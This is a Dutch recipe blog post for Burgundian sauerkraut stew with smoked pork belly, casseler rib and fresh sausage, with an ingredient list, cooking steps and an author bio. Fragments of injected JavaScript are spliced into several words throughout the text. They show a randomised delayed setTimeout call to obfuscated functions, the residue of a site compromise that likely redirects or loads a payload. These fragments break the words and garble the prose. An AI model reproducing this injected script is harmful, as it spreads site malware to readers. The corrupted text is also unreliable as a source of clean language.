Bourgondische zuurkool met buikspek en verse worst

De winter komt er weer aan en dan maak ik graag mijn absolute lievelingskostje; zuurkool. Niet zomaar een zuurkool stampot, maar een echte bourgondische sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofpot met buikspek en verse worst. Laat die winter maar komen!

Wat is zuurkool?

Zuurkool is niet meer dan geraspte of dun gesneden witte kool die door de inwerking van de melkzuurbacterie geconserveerd wordt. Omdat de kool luchtdicht wordt afgedekt, gaat deze gisten. De melkzuurbacterie zorgt er voor dat zetmeel en suikers omgezet worden in melkzuur. Hierdoor onstaat de mooi, krachtige, zure smaak. Ik vind dit echt heerlijk, maar ik ken genoeg mensen die de smaak niet kunnen waarderen. Je kunt je gerecht eventueel wat zoeter maken, door appels of rozijnen dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe te voegen.

Hoe wordt zuurkool gemaakt?

Als je echt wil weten hoe deze kool wordt gemaakt, bekijk dan eens dit filmpje. Beelden afkomstig van Wikipedia van het Polygoonjournaal uit 1945. Hie worden alle stappen gedom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toond bij het maken van zuurkool.

Verse worst!

Traditioneel wordt zuurkool stampot vaak met rookworst gegeten, maar er zijn nog meer lekkere alternatieven. Probeer eens verse worst, speklapjes, casselerrib of dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees/”>sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees. In dit gerecht zijn zelfs meerdere soorten worst gebruikt. Je kunt deze apart bakken, maar ook gewoon laten meesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toven. De kleur blijft hierdoor wel wat lichter dan als je de worst bakt in de pan. Qua smaak is het allebei net zo lekker, maar wel anders. Bij het meesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toven proef je dat alle smaken van het gerecht echt helemaal in de worst zijn getrokken, terwijl bij bakken in de pan je weer een lekkere grill smaak krijgt.

Tip: Casselerrib kun je zowel in de supermarkt als bij de slager in dikke plakken van ongeveer een centimeter laten snijden. Dit zelfde geldt eigenlijk voor spek (ontbijtspek).

 

 

Recept

Ingrediënten

 • 100 gram roomboter
 • 1 kg zuurkool
 • 3 witte uien
 • 2 appels
 • 250 gram gerookt buikspek
 • 500 gram casselerib
 • 6 worstjes
 • 2 kruidnagels
 • 5 jeneverbessen
 • 1 tl hele zaadjes van koriander
 • 6 peperkorrels
 • 200 ml droge witte wijn
 • 1 kg aardappelen
 • Mosterd

Aan de slag!

 1. Kneus de kruiden en doe ze in een kruidenbuiltje of thee-ei. Je kunt ook een koffiefilterzakje gebruiken als je dit niet in huis hebt.
 2. Versnipper de uien en stoof ze zacht in de helft van de boter.
 3. Rasp de appels hierboven en laat even meestoven.
 4. Meng de zuurkool er voorzichtig door en draai het vuur uit.
 5. Snijd het spek en de casselerrib in stukken.
 6. Bak het spek aan in de andere helft van de boter. Bedek het met een laag van de zuurkool.
 7. Leg hierop het kruidenbuiltje en de casselerrib.
 8. Bedek weer met een laag zuurkool, hierboven op de worstjes en tenslotte nog een laag zuurkool.
 9. Giet er tenslotte de wijn overheen en laat tenminste 60 minuten pruttelen.
 10. Schil en kook ondertussen de aardappelen.
 11. Serveer met mosterd, peper en zout.

Leuk om te weten..

Dit is een recept geïnspireerd door "Dagelijkse Kost" van Jeroen Meus, een Belgische tv-kok.

Score

 • Score 5.0

User Rating

5 (1 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Bourgondische zuurkool met buikspek en verse worst"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.